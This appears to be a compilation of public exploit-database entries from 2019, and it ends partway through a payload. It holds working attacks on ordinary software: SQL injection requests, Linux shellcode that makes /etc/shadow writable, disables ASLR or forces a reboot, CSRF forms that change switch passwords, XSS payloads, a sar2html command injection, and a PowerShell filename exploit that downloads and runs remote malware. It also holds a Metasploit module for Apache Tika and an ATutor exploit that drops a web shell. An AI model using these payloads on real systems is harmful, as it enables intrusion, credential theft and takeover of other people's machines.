# Exploit Title: WebIncorp ERP - SQL injection
# Date: 1.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webincorp.com/products/erp-software-qatar
# Version: Every version
# CWE : CWE-89

Vulnerable parameter: prod_id (product_detail.php)

[GET Request]

GET https://host/product_detail.php?prod_id=x' HTTP/1.1
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Cache-Control: max-age=0
Cookie: PHPSESSID=t57dv7rdsvut33jroled9v6435
Host: host
Referer: https://host/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362

#---------------------- DESCRIPTION -------------------------------------#

; Title: chmod(“/etc/shadow”, 0666) and exit for Linux/x86 - Polymorphic 
; Author: Daniel Ortiz
; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
; Size: 53 bytes
; SLAE ID: PA-9844


#---------------------- ASM CODE ------------------------------------------#


SECTION .data

  EXIT_CALL equ 1
  CHMOD_CALL equ 15

SECTION .text


global _start


 _start:
       nop
  cdq

  push byte CHMOD_CALL
  pop eax


  push edx
  push byte 0x77
  push word 0x6f64

  mov esi, 0x222933f0
  add esi, 0x3f3f3f3f
  push esi
  xor esi, esi

  mov esi, 0x243525f0
  add esi, 0x3f3f3f3f
  push esi
  xor esi, esi


  mov ebx, esp
  push word 0666Q
  pop ecx
  int 0x80

  mov al, EXIT_CALL
  int 0x80


#------------------------- final shellcode ----------------------------------------#

unsigned char buf[] = 
"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66"
"\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81"
"\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe"
"\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f"
"\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6"
"\x01\x59\xcd\x80\xb0\x01\xcd\x80";


#------------------------- usage --------------------------------------------------# 


#include<stdio.h>
#include<string.h>

unsigned char code[] = \ 

"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\xb0\x01\xcd\x80";


main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}

#---------------------- DESCRIPTION -------------------------------------#

; Title: Linux x86 ASLR deactivation for Linux/x86 - Polymorphic 
; Author: Daniel Ortiz
; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
; Size: 107 bytes
; SLAE ID: PA-9844


#---------------------- ASM CODE ------------------------------------------#


SECTION .data

        WRITE_SYSCALL equ 4

        CLOSE_SYSCALL equ 6

SECTION .text

global _start



_start: 
        nop
        mov eax, 0xffffffff
        not eax
        push eax
        mov esi, 0x65636170
        push esi
        xor esi, esi
        mov esi, 0x735f6176
        push esi
        xor esi, esi
        push dword 0x5f657a69
        push dword 0x6d6f646e
        push dword 0x61722f6c
        push dword 0x656e7265
        push dword 0x6b2f7379
        push dword 0x732f636f

        mov esi, 0x72702f2f
        push esi
        xor esi, esi


        mov ebx,esp 
        mov cx,0x2bc 
        mov al,0x6
        inc al
        inc al
        int 0x80
        mov ebx,eax 
        push eax 
        mov dx,0xb01
        add dx,0x2f2f 
        push dx 
        mov ecx,esp 
        cdq 
        inc edx
        mov al,WRITE_SYSCALL 
        int 0x80
        mov al,CLOSE_SYSCALL
        int 0x80 

        mov al, 1
        int 0x80


#------------------------- final shellcode ----------------------------------------#

unsigned char buf[] = 
"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f"
"\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72"
"\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3"
"\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2"
"\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";



#------------------------- usage --------------------------------------------------# 

#include<stdio.h>
#include<string.h>

unsigned char code[] = \ 


"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";


main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}

#---------------------- DESCRIPTION -------------------------------------#

; Title: [NOT encoded] Linux/x86 Force Reboot shellcode for Linux/x86 - Polymorphic 
; Author: Daniel Ortiz
; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
; Size: 51 bytes
; SLAE ID: PA-9844


#---------------------- ASM CODE ------------------------------------------#


SECTION .data

         SYSCALL_EXECVE equ 11

SECTION .text

global _start

_start:
        nop
        or eax, 0xffffffff
        not eax
        push eax


        mov eax, 0x8b90909d
        not eax
        push eax

        mov eax, 0x9a8dd091
        not eax
        push eax

        mov eax, 0x969d8cd0
        not eax
        push eax

        xor eax, eax
        mov ebx, esp
        push eax
        push word  0x662d
        mov  esi, esp
        push eax
        push esi
        push ebx
        mov  ecx, esp
        or   al, SYSCALL_EXECVE
        int  0x80


#------------------------- final shellcode ----------------------------------------#

unsigned char buf[] = 

"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50"
"\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0"
"\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";




#------------------------- usage --------------------------------------------------# 

include <stdio.h>
#include <string.h>

char *shellcode = 

"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";

int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

# Product : Catalyst 3850 Series Device Manager
# Version : 3.6.10E
# Date: 01.08.2019
# Vendor Homepage: https://www.cisco.com
# Exploit Author: Alperen Soydan
# Description : The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to verify
the requests. This can be exploited to perform certain actions with
administrative privileges if a logged-in user visits a malicious web site.
@special thx:Haki Bülent Sever
# Tested On : Win10 & KaliLinux


Change Switch Password CSRF @Catalyst 3850 Series Device Manager
note : You must edit the values written by "place"
___________________________________________________________

<html>
<body>
<form
action="http://IP/%24moreField%20%0A%24a%20%24b1%0A%24c1%0A%24c2%0Awrite%20memory%0A"
method="POST">
<input type="hidden" name="SNMP_STATUS" value="SNMP+agent+enabled%0D%0A" />
<input type="hidden" name="send" value="nsback.htm" />
<input type="hidden" name="SNMP_READCOMM_DEFVAL" value="ELVIS" />
<input type="hidden" name="SNMP_CONTACT_DEFVAL" value="Network+Support+Group" />
<input type="hidden" name="SNMP_LOCATION_DEFVAL" value="TEST2" />
<input type="hidden" name="text_ipAddress0" value="place first octet" />
<input type="hidden" name="text_ipAddress1" value="place second octet" />
<input type="hidden" name="text_ipAddress2" value="place third octet" />
<input type="hidden" name="text_ipAddress3" value="place fourth octet" />
<input type="hidden" name="list_subnetMask" value="place subnet mask ip" />
<input type="hidden" name="text_ipDefaultGateway0" value="place gw ip first octet" />
<input type="hidden" name="text_ipDefaultGateway1" value="place gw ip second octet" />
<input type="hidden" name="text_ipDefaultGateway2" value="place gw ip third octet" />
<input type="hidden" name="text_ipDefaultGateway3" value="palce gw ip fourth octet" />
<input type="hidden" name="text_enableSecret" value="KEY" />
<input type="hidden" name="text_confirmEnableSecret" value="KEY" />
<input type="hidden" name="text_sysName" value="SW_TEST" />
<input type="hidden" name="list_date" value="19" />
<input type="hidden" name="list_month" value="Jul" />
<input type="hidden" name="list_year" value="2019" />
<input type="hidden" name="list_hour" value="10" />
<input type="hidden" name="list_minute" value="20" />
<input type="hidden" name="list_period" value="AM" />
<input type="hidden" name="list_timezone" value="C" />
<input type="hidden" name="radio_telnetAccess" value="disable" />
<input type="hidden" name="radio_snmpStatus" value="enable" />
<input type="hidden" name="text_snmpReadComm" value="ELVIS" />
<input type="hidden" name="text_sysContact" value="Network+Support+Group" />
<input type="hidden" name="text_sysLocation" value="TEST2" />
<input type="hidden" name="list_ipv6_interface" value="Vlan500" />
<input type="hidden" name="list_prefix" value="64" />
<input type="hidden" name="moreField" value="more flash:/html/more.txt" />
<input type="hidden" name="a" value="cluster pref file e.cli" />
<input type="hidden" name="z" value="cluster pref file append e.cli" />
<input type="hidden" name="b1" value="!enable secret KEY!ip http authentication enable!end" />
<input type="hidden" name="c1" value="copy e.cli running-config" />
<input type="hidden" name="c2" value="delete /force e.cli" />
<input type="submit" value="submit form" />
</form>
</body>
</html>

# Exploit Title:Web Studio Ultimate Loan Manager V2.0 - Persistent Cross Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: http://www.webstudio.co.zw/
# Software Link: https://codecanyon.net/item/ultimate-loan-manager/19891884
# Version: V2.0
# Category: Webapps
# Software Description : Ultimate Loan Manager is an online loam management system that allows lending businesses to manage their borrowers, loans, repayments, and collections with ease while being affordable at the same time.
# CVE : CVE-2019-14427
==================================================================

#Description:XSS exists in WEB STUDIO Ultimate Loan Manager 2.0 by adding a branch under the Branches button that sets the notes parameter with crafted JavaScript code.



POST /branch/store HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/branch/create
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Cookie: XSRF-TOKEN=eyJpdiI6Imk3Y3llMlBkM0xOUHJNQ1NqYjg2dGc9PSIsInZhbHVlIjoiTmkxMlBlYnVTaHJYR0NZWWxNNEFrSE9PQ3UyUlA5OUg0eU1XUGoxWGR1UUJQbWk2KzRQVVhRTUhEMzBTWkVDMCIsIm1hYyI6Ijk0MGQxN2VhNGQzZDBhZjI4YTg4M2VkODE0NTVhNDFjNmM4MDEwM2U1NGQyOTM3N2FhZDZjMjdjNTUxYjE5ZDMifQ%3D%3D; laravel_session=U1GDgNLtFJQDdPa2jK8rb1vjWE6mkZ6XwrH0PxE7
Connection: close
Upgrade-Insecure-Requests: 1

_token=P31Y1Y1VoVj1yaN3lpSQfssubgRXYszMUpilyYSu&name=test&notes=%3cscript%3ealert(1)%3c%2fscript%3e

# Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection
# Date: 1.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154
# CWE : CWE-89

Vulnerable parameter: slug (news.php)

[GET Request]

GET //host/[path]/news.php?slug=x' HTTP/1.1
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Cache-Control: max-age=0
Cookie: PHPSESSID=87e839a144a7c326454406dea88b92bc
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362

# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.

******************************************************************
*                  1CRM On-Premise Software 8.5.7                *
*                           Stored XSS                           *
******************************************************************


////////////////////////////////////////////////////////////////////////////////////

# Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting
# Date: 19/07/2019
# Exploit Author: Kusol Watchara-Apanukorn
# Vendor Homepage: https://1crm.com/
# Version: 8.5.7 <=
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-14221
////////////////////////////////////////////////////////////////////////////////////


//////////////////////////////////////////////////////////////////////////////////////////////////////////////

1CRM On-Premise Software 8.5.7 allows XSS via a payload that is
mishandled during a Run Report operation.  ///

//////////////////////////////////////////////////////////////////////////////////////////////////////////////


Vulnerability Description:

XSS flaws occur whenever an application includes untrusted data in a
new web page without proper validation or escaping, or updates an
existing web page with user supplied data using a browser API that can
create JavaScript. XSS allows attackers to execute scripts in the
victim’s browser which can hijack user sessions, deface web sites, or
redirect the user to malicious sites.


########################################################################################################################
Attack Narratives and Scenarios:
                                                #

                                                #
**Attacker**
                                                #
1. Login as any user
                                                #
2. Click Email icon
                                                #
3. Click Report
                                                #
4. Click Create Report
                                                #
5. Fill Report Name (In our case we fill Company B)
                                                #
6. Assign to Victim (In our case we assigned to admin)
                                                #
7. Click Column Layout
                                                #
8. Click Add empty column
                                                #
9. Input malicious code (In our case:
<script>alert(document.cookie);</script>)
          #
10. Click Save
                                                #

                                                #
**Victim**
                                                #
1. Click email icon
                                                #
2. Click Report
                                                #
3. Choose report that we recently created (In our case we choose
Company B)                                            #
4. Click Run Report
                                                #
5. Admin cookie will popup
                                                #
########################################################################################################################

PoC

-----------------------------------------

Github: https://github.com/cccaaasser/1CRM-CVE/blob/master/CVE-2019-14221.md


Vulnerability Disclosure Timeline:
==================================

19 July, 19 : Found Vulnerability

19 July, 19 : Vendor Notification

24 July  19 : Vendor Response

24 July  19 : Vendor Fixed

31 July, 19 : Vendor released new patched version 8.5.10

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security          


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for system administrators.
PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.


[Vulnerability Type]
Unsanitized Filename Command Execution


[CVE Reference]
N/A


[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
or the running of unexpected commands straight from the filename itself without the need for a second file.

For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.

However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.

Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger 
the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.

My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
abbreviated for space then it sleeps for 2 seconds and finally executes.

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
commands can be stored.

For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.

First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.

Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1

Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
The "-e" is abbreviated for EncodedCommand to again save filename space.

Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
Double click to open in PowerShell watch the file get downloaded saved and executed!

My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!


[Exploit / PoC]
from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================


def parse_args():
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    return parser.parse_args()

def main(args):
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))

def create_file(payload):
    f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()

if __name__=="__main__":

    parser = argparse.ArgumentParser()
    PSCmds = main(parse_args())

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    create_file(PSCmds)
    print "PowerShell - Unsantized Filename Command Execution File created!"
    print "By hyp3rlinx"




[POC Video URL]
https://www.youtube.com/watch?v=AH33RW9g8J4


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: July 20, 2019
MSRC "does not meet the bar for security servicing" : July 23, 2019
August 1, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Apache Tika Header Command Injection',
'Description'    => %q{
          This module exploits a command injection vulnerability in Apache
        Tika 1.15 - 1.17 on Windows.  A file with the image/jp2 content-type is
        used to bypass magic bytes checking.  When OCR is specified in the
        request, parameters can be passed to change the parameters passed
        at command line to allow for arbitrary JScript to execute. A
        JScript stub is passed to execute arbitrary code. This module was
        verified against version 1.15 - 1.17 on Windows 2012.
        While the CVE and finding show more versions vulnerable, during
        testing it was determined only > 1.14 was exploitable due to
        jp2 support being added.
      },
'License'        => MSF_LICENSE,
'Privileged'     => false,
'Platform'       => 'win',
'Targets'        =>
        [
          ['Windows',
            {'Arch' => [ARCH_X86, ARCH_X64],
'Platform' => 'win',
'CmdStagerFlavor' => ['certutil']
            }
          ]
        ],
'DefaultTarget'  => 0,
'DisclosureDate' => 'Apr 25 2018',
'Author' =>
        [
'h00die', # msf module
'David Yesland', # edb submission
'Tim Allison' # discovery
        ],
'References' =>
        [
          ['EDB', '46540'],
          ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
          ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
          ['CVE', '2018-1335']
        ]))

    register_options(
      [
        Opt::RPORT(9998),
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [true, 'Override check result', false])
      ])
  end

  def check
    res = send_request_cgi({
'uri'    => normalize_uri(target_uri),
           })
    if res.nil?
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    elsif res.code != 200
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    end

    if res.body =~ /Apache Tika (\d.[\d]+)/
      version = Gem::Version.new($1)
      vprint_status("Apache Tika Version Detected: #{version}")
      if version.between?(Gem::Version.new('1.15'), Gem::Version.new('1.17'))
        return CheckCode::Vulnerable
      end
    end
    CheckCode::Safe
  end

  def execute_command(cmd, opts = {})
    cmd.gsub(/"/, '\"')
    jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
    jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"

    print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
    res = send_request_cgi({
'method' => 'PUT',
'uri'    => normalize_uri(target_uri, 'meta'),
'headers' => {
"X-Tika-OCRTesseractPath" => '"cscript"',
"X-Tika-OCRLanguage"      => "//E:Jscript",
"Expect"                  => "100-continue",
"Content-type"            => "image/jp2",
"Connection"              => "close"},
'data' => jscript
           })

    fail_with(Failure::Disconnected, 'No server response') unless res
    unless (res.code == 200 && res.body.include?('tika'))
      fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
    end
  end

  def exploit
    checkcode = check
    unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
      print_error("#{checkcode[1]}. Set ForceExploit to override.")
      return
    end

    execute_cmdstager(linemax: 8000)
  end
end

# Exploit Title: College Notes Management System 1.0 - CSRF (Add Note)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 3, 2019
# Vendor Homepage: https://anirbandutta.ml/
# Software Link: https://sourceforge.net/projects/college-notes-management/
# Software Link: https://github.com/anirbandutta9/College-Notes-Gallery
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<form role="form" action="http://localhost/[PATH]/dashboard/uploadnote.php" method="POST" enctype="multipart/form-data">

<div class="form-group">
<label for="post_title">Note Title</label>
<input type="text" name="title" class="form-control" placeholder="Eg: Php Tutorial File" value="" required="">
</div>

<div class="form-group">
<label for="post_tags">Short Note Description</label>
<input type="text" name="description" class="form-control" placeholder="Eg: Php Tutorial File includes basic php programming ...." value="" required="""="">
</div>

<div class="form-group">
<label for="post_image">Select File</label><font color="brown"> (allowed file type: 'pdf','doc','ppt','txt','zip' | allowed maximum size: 30 mb ) </font>
<input type="file" name="file"> 
</div>

<button type="submit" name="upload" class="btn btn-primary" value="Upload Note">Upload Note</button><br><br>
</form>

#!/usr/bin/env python
#
# Exploit Title: ATutor 2.2.4 'language_import' Arbitrary File Upload / RCE [CVE-2019-12169]
# Date: 5/24/19
# Exploit Author: liquidsky (JMcPeters)
# Vendor Homepage: https://atutor.github.io/
# Software Link: https://sourceforge.net/projects/atutor/files/latest/download
# Version: 2.2.4
# Tested on: Windows 8 / Apache / MySQL (XAMPP)
# CVE : CVE-2019-12169
# Author Site: http://incidentsecurity.com/atutor-2-2-4-language_import-arbitrary-file-upload-rce/
#            : https://github.com/fuzzlove
#
# Description: ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal
# resulting in remote code execution via a ".." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component.
#
# Greetz: wetw0rk, offsec ^^
#
# Notes: This application is no longer being maintained so there is no fix for this issue.

import sys, hashlib, requests
import urllib
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import time


print "+-------------------------------------------------------------+"
print
print "- ATutor 2.2.4 Arbitrary File Upload / RCE [CVE-2019-12169]"
print
print "-          Discovery / PoC by liquidsky (JMcPeters) ^^"
print
print "+-------------------------------------------------------------+"

try:
#settings
  target   = sys.argv[1]
  username = sys.argv[2]
  password = sys.argv[3]
  commands = sys.argv[4]

except IndexError:

        print
  print "- usage: %s <target> <username> <password> <command>" % sys.argv[0]
  print "- Example: %s incidentsecurity.com admin mypassword 'whoami'" % sys.argv[0]
        print
  sys.exit()


# headers to upload zip
headers = {
"Accept-Encoding": "gzip, deflate",
"Referer": "http://" + target + "/ATutor/mods/_core/languages/language_import.php",
"Connection": "close",
"Content-Type": "multipart/form-data; boundary=---------------------------CVE201912169",
}

# Note: This was successfully tested against a windows install however it should work with linux.
# -----
# This will drop a shell on c:\xampp\htdocs\liquidsky.php and or /var/www/html/liquidsky.php
# using directory traversal.


# php file payload
data = ""
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x43"
data += "\x56\x45\x32\x30\x31\x39\x31\x32\x31\x36\x39\x0d\x0a\x43\x6f"
data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69"
data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20"
data += "\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x22\x3b\x20\x66\x69"
data += "\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x70\x6f\x63\x2e\x7a\x69\x70"
data += "\x22\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65"
data += "\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x7a"
data += "\x69\x70\x0d\x0a\x0d\x0a\x50\x4b\x03\x04\x14\x00\x00\x00\x08"
data += "\x00\xa4\x00\xb8\x4e\xbb\xb9\x35\x2d\x6a\x00\x00\x00\x6a\x00"
data += "\x00\x00\x2c\x00\x00\x00\x2e\x2e\x5c\x2e\x2e\x5c\x2e\x2e\x5c"
data += "\x2e\x2e\x5c\x2e\x2e\x5c\x2e\x2e\x2f\x78\x61\x6d\x70\x70\x5c"
data += "\x68\x74\x64\x6f\x63\x73\x5c\x6c\x69\x71\x75\x69\x64\x73\x6b"
data += "\x79\x2e\x70\x68\x70\xb3\xb1\x2f\xc8\x28\x50\x48\x2d\x4b\xcc"
data += "\xd1\x50\xb2\xb7\x53\xd2\x4b\x4a\x2c\x4e\x35\x33\x89\x4f\x49"
data += "\x4d\xce\x4f\x49\xd5\x50\x72\x09\xcc\xf7\x02\x62\x8b\x00\x63"
data += "\xa7\xfc\x64\x67\xa7\x9c\x48\xa3\x8c\x32\x4f\x0f\xa7\x8c\x64"
data += "\x63\x3f\x83\x44\x0f\x2f\x43\x6f\xe7\xa0\xb4\x20\x83\xb0\xd0"
data += "\xf0\xca\x94\xe2\xc8\x70\xd3\xbc\x94\x70\xb7\xbc\xa8\xe0\x94"
data += "\x14\xef\x90\xe2\xf4\x80\x2a\x13\x3f\xe7\x74\x5b\x5b\x25\x4d"
data += "\x4d\x6b\x05\x7b\x3b\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08"
data += "\x00\xa4\x00\xb8\x4e\xbb\xb9\x35\x2d\x6a\x00\x00\x00\x6a\x00"
data += "\x00\x00\x2c\x00\x00\x00\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"
data += "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x76\x61\x72\x2f\x77\x77"
data += "\x77\x2f\x68\x74\x6d\x6c\x2f\x6c\x69\x71\x75\x69\x64\x73\x6b"
data += "\x79\x2e\x70\x68\x70\xb3\xb1\x2f\xc8\x28\x50\x48\x2d\x4b\xcc"
data += "\xd1\x50\xb2\xb7\x53\xd2\x4b\x4a\x2c\x4e\x35\x33\x89\x4f\x49"
data += "\x4d\xce\x4f\x49\xd5\x50\x72\x09\xcc\xf7\x02\x62\x8b\x00\x63"
